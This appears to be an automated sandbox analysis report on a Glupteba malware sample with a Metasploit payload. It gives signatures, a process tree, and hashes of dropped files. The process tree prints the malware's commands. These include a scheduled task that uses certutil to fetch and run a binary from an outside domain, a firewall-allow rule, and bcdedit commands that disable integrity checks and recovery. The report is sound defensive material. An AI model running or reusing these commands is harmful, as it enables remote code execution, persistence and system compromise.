Analysis

  • max time kernel
    150s
  • max time network
    140s
  • platform
    windows7_x64
  • resource
    win7-20231215-en
  • resource tags

    arch:x64 arch:x86 image:win7-20231215-en locale:en-us os:windows7-x64 system
  • submitted
    22/01/2024, 15:20

General

  • Target

    6fc52358b0e882de1fb890076f83172f.exe

  • Size

    4.4MB

  • MD5

    6fc52358b0e882de1fb890076f83172f

  • SHA1

    00fd67d3a87d10c0f8787cd580572c4cd1a7aaa8

  • SHA256

    8980c8abaa3365782c905b3f9506a032c54a5d1833fef1fe0ce46b6f84ee7534

  • SHA512

    f100a089063a9a65662cc863504ffd752a9bb245eae07b80a2dece2c8d19aa1d2b865bc950d134efc2775c23c923f8690785dce835df8f8174eb1654ef147990

  • SSDEEP

    98304:vnGiqTWRDnHhCwJsgkfTryDBzpf8pK5EQgotfPM7TkOtOZAK:rqTEH8wJsJTWVp0pVpIfUIAK

Malware Config

Extracted

Family

metasploit

Version

windows/single_exec

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba payload 22 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Windows security bypass 2 TTPs 10 IoCs
  • Modifies boot configuration data using bcdedit 1 TTPs 14 IoCs
  • Drops file in Drivers directory 1 IoCs
  • Modifies Windows Firewall 1 TTPs 1 IoCs
  • Possible attempt to disable PatchGuard 2 TTPs

    Rootkits can use kernel patching to embed themselves in an operating system.

  • Executes dropped EXE 4 IoCs
  • Loads dropped DLL 13 IoCs
  • Windows security modification 2 TTPs 10 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Manipulates WinMon driver. 1 IoCs

    Rootkits write to WinMon to hide PIDs from being detected.

  • Manipulates WinMonFS driver. 1 IoCs

    Rootkits write to WinMonFS to hide directories/files from being detected.

  • Drops file in System32 directory 6 IoCs
  • Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs

    Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

  • Drops file in Windows directory 3 IoCs
  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • GoLang User-Agent 3 IoCs

    Uses default user-agent string defined by GoLang HTTP packages.

  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies system certificate store 2 TTPs 17 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 62 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\6fc52358b0e882de1fb890076f83172f.exe
    "C:\Users\Admin\AppData\Local\Temp\6fc52358b0e882de1fb890076f83172f.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:1888
    • C:\Users\Admin\AppData\Local\Temp\6fc52358b0e882de1fb890076f83172f.exe
      "C:\Users\Admin\AppData\Local\Temp\6fc52358b0e882de1fb890076f83172f.exe"
      2⤵
      • Windows security bypass
      • Loads dropped DLL
      • Windows security modification
      • Adds Run key to start application
      • Checks for VirtualBox DLLs, possible anti-VM trick
      • Drops file in Windows directory
      • Modifies data under HKEY_USERS
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:2948
      • C:\Windows\system32\cmd.exe
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2580
        • C:\Windows\system32\netsh.exe
          netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
          4⤵
          • Modifies Windows Firewall
          • Modifies data under HKEY_USERS
          PID:2636
      • C:\Windows\rss\csrss.exe
        C:\Windows\rss\csrss.exe /197-197
        3⤵
        • Drops file in Drivers directory
        • Executes dropped EXE
        • Loads dropped DLL
        • Manipulates WinMon driver.
        • Manipulates WinMonFS driver.
        • Drops file in System32 directory
        • Modifies data under HKEY_USERS
        • Modifies system certificate store
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2292
        • C:\Windows\system32\schtasks.exe
          schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://spolaect.info/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
          4⤵
          • Creates scheduled task(s)
          PID:320
        • C:\Windows\system32\schtasks.exe
          schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
          4⤵
          • Creates scheduled task(s)
          PID:2196
        • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
          "C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Modifies system certificate store
          • Suspicious use of WriteProcessMemory
          PID:1548
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:1312
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:716
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -timeout 0
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:1036
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:2404
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:1188
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:1108
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:2396
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:2400
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:912
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:1784
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:2968
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:2772
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:344
        • C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
          C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
          4⤵
          • Executes dropped EXE
          PID:2960
        • C:\Windows\system32\bcdedit.exe
          C:\Windows\Sysnative\bcdedit.exe /v
          4⤵
          • Modifies boot configuration data using bcdedit
          PID:820
        • C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
          C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
          4⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          PID:1500
  • C:\Windows\system32\makecab.exe
    "C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20240122152049.log C:\Windows\Logs\CBS\CbsPersist_20240122152049.cab
    1⤵
    • Drops file in Windows directory
    PID:2684

Network

        MITRE ATT&CK Enterprise v15

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\AAF33CF37E194E98957768CF9C02DE8E2\download.error

          Filesize

          42KB

          MD5

          269e8b02718af7f2f71e0eeaf4837b7c

          SHA1

          34ea9afa097205d5e4d4366ea587408a9e600537

          SHA256

          9c28018e9d6cefeb805ae494322d9c7cd5f1f9b7a5d8e19aef9bab1810f4b05a

          SHA512

          50ef6084db99a6a03d925ae435e4f603ada541ff74667abe1c52042167f87cc0a7239fac04aa3501a2536aa79b1181c4580b76862b5a1b05ca6a382eeee5b0de

        • C:\Users\Admin\AppData\Local\Temp\Symbols\winload_prod.pdb\768283CA443847FB8822F9DB1F36ECC51\download.error

          Filesize

          37KB

          MD5

          1f36de1d64a92087b215ef149fcd2568

          SHA1

          bf21f29c1bcfc1b4d17456441c4f226636dcaa25

          SHA256

          d4317d9b4c2fa1b185603702ecd3308d56e6be9e2d9d46fea696dadabd3f9236

          SHA512

          94d2cb973a3003b43baec597928386d26961e94b88eef6e34c9f4bdfcb6b24a9d3f0a5f567dab1cbb03f5932ec2af1b9bc536c0bdb6b3e86d6fb33a0ed5146b4

        • C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

          Filesize

          94KB

          MD5

          d98e78fd57db58a11f880b45bb659767

          SHA1

          ab70c0d3bd9103c07632eeecee9f51d198ed0e76

          SHA256

          414035cc96d8bcc87ed173852a839ffbb45882a98c7a6f7b821e1668891deef0

          SHA512

          aafbd3eee102d0b682c4c854d69d50bac077e48f7f0dd8a5f913c6c73027aed7231d99fc9d716511759800da8c4f0f394b318821e9e47f6e62e436c8725a7831

        • C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

          Filesize

          121KB

          MD5

          e60d530400f028af7e922e5e2c875ca0

          SHA1

          ad9f16a7508a4a6b7b3d1f9ae245b8a48dbebf80

          SHA256

          fa113874bde122c7537fcb83deec6de3585d752d295785cd82c00cc8476ad71c

          SHA512

          af282a2b38e3953206ce8a375730d69680e998bfa11885b93066023e23d725b0e4449b56a2c9f0126b577ed200af9d67bd00f63654cc31951143ca887cf836a3

        • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe

          Filesize

          209KB

          MD5

          bba273ffce24abc1818e5bd05ced2274

          SHA1

          e1471f7f3480ce7f8b71c621a8d3d17ecc074c28

          SHA256

          edbf0d3e4e03ee8d28b71ad91cf243d913b59d7d85a4deae728e353fdd3350a4

          SHA512

          2471f1ea301c9f43e8abcdb6fd6db4ffe4702d00ddf7a50f204c6bd4a9012c8525f1932f635719883eefec8badba8525bed9b0a9613c1da2daa6218eaf56daab

        • C:\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

          Filesize

          40KB

          MD5

          29ec5d0b01a712a99c49bccd2f19658a

          SHA1

          32c389a909c624633374640c736653bd252cb020

          SHA256

          05f969845fc9a3ae39d6b2fc4b0ab4955c074f52b7d6345787c31ab6cbe0df58

          SHA512

          de461f82fd3358a9d12b4bb92ab14309e51be3b00099cf6f8425e94518d7ffac4c8e0db3426a45aadfd9eca616d69028b7e7be75a4fe6d80a1c23301e81b13ff

        • C:\Users\Admin\AppData\Local\Temp\osloader.exe

          Filesize

          66KB

          MD5

          2df646ac6917e545b8696d4c45c3fb1b

          SHA1

          39c990df4ec8a91442de7e57a1248a281e4fd936

          SHA256

          88687e57ee0b00b03269567028a7c6cb7fe3b89e5d1d69548da5da81bc3d96ee

          SHA512

          59d25f73fdb2f3c969e0f5c43ea3635b04b4dcde0f68302e23fa0bf9cb3341b7d036627549d332121fe04666b8628ddeaa99226e2bc0bd6f6d86a1974fb1120c

        • C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15A

          Filesize

          893B

          MD5

          d4ae187b4574036c2d76b6df8a8c1a30

          SHA1

          b06f409fa14bab33cbaf4a37811b8740b624d9e5

          SHA256

          a2ce3a0fa7d2a833d1801e01ec48e35b70d84f3467cc9f8fab370386e13879c7

          SHA512

          1f44a360e8bb8ada22bc5bfe001f1babb4e72005a46bc2a94c33c4bd149ff256cce6f35d65ca4f7fc2a5b9e15494155449830d2809c8cf218d0b9196ec646b0c

        • C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357

          Filesize

          1KB

          MD5

          a266bb7dcc38a562631361bbf61dd11b

          SHA1

          3b1efd3a66ea28b16697394703a72ca340a05bd5

          SHA256

          df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e

          SHA512

          0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc

        • C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

          Filesize

          344B

          MD5

          93b04407613a8c377c4921879bef1c07

          SHA1

          3c3b3e00f03cbad5cc705569d1dbf1a8ee4d94e5

          SHA256

          8b453c6634578d7749d816547ed7d488d41c4e839de8c2a8b0831cc8f2dd9b23

          SHA512

          e8026352f327cb7b3bc154c03f37b7b608e5a42720faf1fd6f08ec8fb68544717401f3e33d3c97f2c2d1122707cec74bdd0a3d2eaa99497e02932dbd00a8c52f

        • C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

          Filesize

          344B

          MD5

          5c8aa3aacd1d65e5cd2d969adf35607b

          SHA1

          12b7a37a1b9efc7a8f79c96e351f0d613db4df50

          SHA256

          1699adc2ebffb223908aa5e1e37b163ecb8e9f82d7d7165989773fbe1425f48b

          SHA512

          adb50e976a5ed3695949836d9d66b38bbefac7285a52fc00efaf781774b812348ad83e66caebf33bcf3614a97d5a4967e65c106276c124e7061034c0cec20513

        • C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

          Filesize

          344B

          MD5

          d138f54a13723ffd1a5b5b343e2a2576

          SHA1

          d96ae16bfc3204c268886cc6b2bb9098b08b4a7f

          SHA256

          05f2040d24e5fa6ad3401841afac77fdad516f69c09814eecbb2678c6bb7e279

          SHA512

          10117c5cdae457a315c5560299d724ce52549bd01f7ad4aba9f7d831be903223addd96dadaa9c4aa2ccc129b94a521d631ec4888b2b8008feeebc9de542266da

        • C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

          Filesize

          344B

          MD5

          601852b4ebfc21c6e5a79a7b8783823f

          SHA1

          157a9b3217b9900dcd71a7a869d2da9ea8e2a700

          SHA256

          95d39b3ea0c51babc38f2a880f1c48976d3ad92e7d172718b4f675c7e75e0714

          SHA512

          c0b434fc4c505178ea459a5e368b56809555b56e4481d58abfcaeda89ce06ff51fc7b25fed680f42a31e95e08b5fe622f510f6846bb2167e79aa6726d8a7f05e

        • C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357

          Filesize

          242B

          MD5

          b24e2f2d1639cd0fb5b498ecc771ee76

          SHA1

          94ccfd71a6e41d8de0e15fda40d71d3e2e5cec91

          SHA256

          f99d1d19d9c549927e5d26d7ff2ac3c4d709de82f4591fe3aedd332839ada125

          SHA512

          1be4ccab20e6bf8524cb42027445991aa2ef23d9dc0587eed004401c5924182fa81ecb8191d428091e9dff8d1c2cc85fb9e16e063f8a1f60c1295a49e500d628

        • C:\Windows\Temp\Cab36C9.tmp

          Filesize

          65KB

          MD5

          ac05d27423a85adc1622c714f2cb6184

          SHA1

          b0fe2b1abddb97837ea0195be70ab2ff14d43198

          SHA256

          c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

          SHA512

          6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

        • C:\Windows\Temp\Tar36DC.tmp

          Filesize

          146KB

          MD5

          55b1d0a492e483c4b763705480044b9a

          SHA1

          bb49de38c64e58b52478e79afd3d4c90d98b735b

          SHA256

          443a93df5c21f6b334b2cf4f409255efa09d94643e08f21d44e0a50e9944d1e1

          SHA512

          df43f1757e2429a7a72aaee718d6517deec7a967e8cd6998aac55196f965d2b390c60257ccb6e0e3522052673769a8576292d204dce9373c21b20e5e453d8375

        • C:\Windows\rss\csrss.exe

          Filesize

          29KB

          MD5

          da3a466db3f5fe8f843ef7cfd1618c28

          SHA1

          82ec11965b091ea236be6e19ba911105716041dd

          SHA256

          41c380c00a5d5da95b62829040e5742a88cc504ad8ca5c543e4a2b5318782bc6

          SHA512

          b483766fa8d7bd73a5758c19521524f41cd88799a717637b3dd193a66e0dccbc96259034992d2fbad371e19ec4884966fda9ccaa32a41a38482cbc11a1a4b383

        • C:\Windows\rss\csrss.exe

          Filesize

          94KB

          MD5

          6926adaf780305972fb5cf31ebe9a2ed

          SHA1

          e8aa1edc06d2f5ee82d149d2fd95020390f65ba1

          SHA256

          f1dabaf445249d13ea71abba5bcdb90c9d761f4033cfe7df55120501677e562d

          SHA512

          8b5eb0389dd381c35a5a192ab5b42330cbd4b76e064e610bb3a066d8affc00e26cc22453828a55be5de34ff0a19ec4fd9ec85225d907dd9c8a6ebf64c97a8087

        • C:\Windows\rss\csrss.exe

          Filesize

          257KB

          MD5

          385cf39a9e9589df2810c2bbf6de34e6

          SHA1

          6103a6084030034b5cc632a867f95c2b0ae64918

          SHA256

          e5ba7b7c2e4fcd9f2eaa1df62f9c4dce5dd3694b5e57473a2cf3a45d10628f6f

          SHA512

          284dfde3bd17b713ec53dfc102d0e1e5953edcc95ebf93b261eee7033d7456fd55f07e9d2197184c06176ac1e022fba0c77e307e6cf70eab695811549460464c

        • \Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

          Filesize

          61KB

          MD5

          40b987a0e34d0b76ed5040eec345045d

          SHA1

          97911641cbcc410965c135c2c6c7ec2d07bb840c

          SHA256

          6f978cf047b9dc37ffa64e634ac269bac5ef7694d3cbaa321b900fd8e1d5133a

          SHA512

          b5e56e22510bd1c9557e359f6758626f7e1d0510f00cc8a1673932595bfe54f5208fb6b80eb28266fb62e1ad381b8547f3e99318e910eee47bdf077489ab51c5

        • \Users\Admin\AppData\Local\Temp\csrss\patch.exe

          Filesize

          356KB

          MD5

          185707ee44bcf0704b83b7e3a4cc1402

          SHA1

          d80228b6be8a7ecbf59a8f3907a14d45053f06c1

          SHA256

          0bc385fe30975e64ff33165ffefb30f83574dd51f10dfe207ec31cf78936dfe8

          SHA512

          e2e74590c4586d05aa7f950e919555e82e840390b3c01881684e3e1783b7076d9042708a745fc6355c8d9253ec3f5b61603de521d0e8ea8379a2b9b12aa664f8

        • \Users\Admin\AppData\Local\Temp\dbghelp.dll

          Filesize

          283KB

          MD5

          e88625bce8978293ad8ceb37b0971c46

          SHA1

          8daa789d5725fe851aff894b1e3426c976a5c3be

          SHA256

          8004b05b9094d57ba42db8f2501400e5093a52604dbe38467163ffee01ac2f40

          SHA512

          1df9e711c09a5687d5ef41746d8a2f99a04c397cab9e392b47054581e32096096a71db4f5f38a9d514fff7dd4679ee5a2e5a30f9956a240045a8eca356d47edd

        • \Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

          Filesize

          295KB

          MD5

          1430d9cfff91ada560881dceb6278a03

          SHA1

          f083a7df5ad4125fb4755f3e7ddb73a11ce1dc5e

          SHA256

          32bd93b964a5ec12d2eb96ee08070e2fabb15679ca629ac00a2862d932a029ef

          SHA512

          7f64cfde9c67c53c505f5902b34229bad0562e382cda48267279f4dd56ce1bc4130afeb655cad61f81f3aa742952a48dc9a6377a08b895241ea7331637bb3bed

        • \Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

          Filesize

          308KB

          MD5

          0e743a01afc12536d971b4235a577d7f

          SHA1

          ec837490ad49136bc237f412065d040228072607

          SHA256

          8f953aaf7ac5abd5ae4113b2ad67530531ccf91d95010976b863790d2980e4fc

          SHA512

          10edfbb929348a108cbe034a706c069aa09f69c5531cd079fa48fbb33a9a45474dfa3683fa70993fa9b92c4e74bd4d75e62209a440b8d2524bdacb2f927dd22f

        • \Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

          Filesize

          10KB

          MD5

          0a7dde37ef86ec6c37fad7d2ceea6723

          SHA1

          778c484b2334f226aa424f5f7448488af5b25240

          SHA256

          867f9ef995ed60045ed2d2a8f2c97c1a6b329303231bdd9b75baea6bea729dc2

          SHA512

          075483bee52787dae91e66ee52faa80aba476945daa942d1f9d53a284c4b178acf1c9172b37223e629053704ceca819d84070f5a95bf0930eb9dc4314b3d9c0c

        • \Users\Admin\AppData\Local\Temp\osloader.exe

          Filesize

          53KB

          MD5

          21ed97d74994c8357fe39aecd8efc8f5

          SHA1

          c990bb19652cff77687d45ff3c189b9572d35aa2

          SHA256

          8f65ff40c4bc4d3f881fd428d1fa9f875ddce6336183b404fd0e9cf3c5819ec3

          SHA512

          b44f2c4a9345a754b2c42e2052d4f680c18eee4c4d327b1c94b0aadd27318c02ffe0a4a9c6a049c4a25ae1ea94b2e8082c29f0e334f9f9c19f1adf6b701a6806

        • \Users\Admin\AppData\Local\Temp\osloader.exe

          Filesize

          91KB

          MD5

          c3ca5c6e95210ff78adb90747a474ff1

          SHA1

          87b78723e6c658ad2eab5be8b5607863dbd0b212

          SHA256

          6d155f496f392164a8cd83e2bb8dc9293f04659c2dc26149d166aae61ad19e55

          SHA512

          26f83d03026d50c0db26f6cabd022d50272ba6d76ba33a31d221d55f05e39daf166bd920a6915e177fe1dc2c53e8046873694761d031e76401050d8ab8b37b8b

        • \Users\Admin\AppData\Local\Temp\osloader.exe

          Filesize

          45KB

          MD5

          4327e7df202eb6c5dbae78a54419715f

          SHA1

          9129642c83f6c529d7e6be034f39d0da3487909c

          SHA256

          279f97ca83a487d57152b676287c070855c092e6ab2fa03b094f0ee38c7d48c9

          SHA512

          88eccd99b472a855af7cd04b3d61fe841c9f3d819e15db2f8b07d91e95a61c5303a04b7ea256e7253b999597908b5802fc1185b76f6e04ff5a2fea73b1ced10d

        • \Users\Admin\AppData\Local\Temp\symsrv.dll

          Filesize

          163KB

          MD5

          5c399d34d8dc01741269ff1f1aca7554

          SHA1

          e0ceed500d3cef5558f3f55d33ba9c3a709e8f55

          SHA256

          e11e0f7804bfc485b19103a940be3d382f31c1378caca0c63076e27797d7553f

          SHA512

          8ff9d38b22d73c595cc417427b59f5ca8e1fb7b47a2fa6aef25322bf6e614d6b71339a752d779bd736b4c1057239100ac8cc62629fd5d6556785a69bcdc3d73d

        • \Windows\rss\csrss.exe

          Filesize

          776KB

          MD5

          e48d76bc67000593f276248b22854291

          SHA1

          4b98d8b30b70b51bab29d32afa734e34406aa66f

          SHA256

          182b137d01de00a40dac8b4be2a85749618115e993857082ff76a1ff275b85ab

          SHA512

          87de9acc3016370cda9bcb918847017253404c0c1bf7c76e21e14d6a41a0ef182677a98010389a806e617281bd96ff314fcde7f4ef7d2d241c4b0352fa6a83f6

        • \Windows\rss\csrss.exe

          Filesize

          97KB

          MD5

          69dbfc8a092503f99dc31ac921039f4e

          SHA1

          d85c0504ef5ee50d9bd0ae624e941964c2c1d752

          SHA256

          ca02f11f3ac601fa88b61def69fd322935972ed730f51f8d35ee57382033f677

          SHA512

          5f8c13228577efdca3968d5a881d6cc6bb02cbf9879077d119fa10ddde68b85a6a60bd937881f4dfcef2ec227ce68285d2a602bb90efb014a9e7e84cfbef08fb

        • memory/1548-44-0x0000000140000000-0x00000001405E8000-memory.dmp

          Filesize

          5.9MB

        • memory/1548-36-0x0000000140000000-0x00000001405E8000-memory.dmp

          Filesize

          5.9MB

        • memory/1888-1-0x0000000004BE0000-0x000000000501C000-memory.dmp

          Filesize

          4.2MB

        • memory/1888-6-0x0000000004BE0000-0x000000000501C000-memory.dmp

          Filesize

          4.2MB

        • memory/1888-2-0x0000000005020000-0x0000000005946000-memory.dmp

          Filesize

          9.1MB

        • memory/1888-3-0x0000000000400000-0x00000000030F1000-memory.dmp

          Filesize

          44.9MB

        • memory/1888-0-0x0000000004BE0000-0x000000000501C000-memory.dmp

          Filesize

          4.2MB

        • memory/1888-8-0x0000000005020000-0x0000000005946000-memory.dmp

          Filesize

          9.1MB

        • memory/1888-4-0x0000000000400000-0x00000000030F1000-memory.dmp

          Filesize

          44.9MB

        • memory/2292-384-0x0000000000400000-0x00000000030F1000-memory.dmp

          Filesize

          44.9MB

        • memory/2292-388-0x0000000000400000-0x00000000030F1000-memory.dmp

          Filesize

          44.9MB

        • memory/2292-300-0x0000000000400000-0x00000000030F1000-memory.dmp

          Filesize

          44.9MB

        • memory/2292-298-0x0000000004B20000-0x0000000004F5C000-memory.dmp

          Filesize

          4.2MB

        • memory/2292-294-0x0000000000400000-0x00000000030F1000-memory.dmp

          Filesize

          44.9MB

        • memory/2292-404-0x0000000000400000-0x00000000030F1000-memory.dmp

          Filesize

          44.9MB

        • memory/2292-24-0x0000000000400000-0x00000000030F1000-memory.dmp

          Filesize

          44.9MB

        • memory/2292-22-0x0000000004B20000-0x0000000004F5C000-memory.dmp

          Filesize

          4.2MB

        • memory/2292-403-0x0000000000400000-0x00000000030F1000-memory.dmp

          Filesize

          44.9MB

        • memory/2292-400-0x0000000000400000-0x00000000030F1000-memory.dmp

          Filesize

          44.9MB

        • memory/2292-390-0x0000000000400000-0x00000000030F1000-memory.dmp

          Filesize

          44.9MB

        • memory/2292-353-0x0000000000400000-0x00000000030F1000-memory.dmp

          Filesize

          44.9MB

        • memory/2292-389-0x0000000000400000-0x00000000030F1000-memory.dmp

          Filesize

          44.9MB

        • memory/2292-299-0x0000000000400000-0x00000000030F1000-memory.dmp

          Filesize

          44.9MB

        • memory/2292-383-0x0000000000400000-0x00000000030F1000-memory.dmp

          Filesize

          44.9MB

        • memory/2292-19-0x0000000004B20000-0x0000000004F5C000-memory.dmp

          Filesize

          4.2MB

        • memory/2292-385-0x0000000000400000-0x00000000030F1000-memory.dmp

          Filesize

          44.9MB

        • memory/2292-386-0x0000000000400000-0x00000000030F1000-memory.dmp

          Filesize

          44.9MB

        • memory/2292-387-0x0000000000400000-0x00000000030F1000-memory.dmp

          Filesize

          44.9MB

        • memory/2948-20-0x0000000000400000-0x00000000030F1000-memory.dmp

          Filesize

          44.9MB

        • memory/2948-21-0x0000000004AE0000-0x0000000004F1C000-memory.dmp

          Filesize

          4.2MB

        • memory/2948-10-0x0000000000400000-0x00000000030F1000-memory.dmp

          Filesize

          44.9MB

        • memory/2948-7-0x0000000004AE0000-0x0000000004F1C000-memory.dmp

          Filesize

          4.2MB

        • memory/2948-5-0x0000000004AE0000-0x0000000004F1C000-memory.dmp

          Filesize

          4.2MB

        • memory/2948-9-0x0000000004F20000-0x0000000005846000-memory.dmp

          Filesize

          9.1MB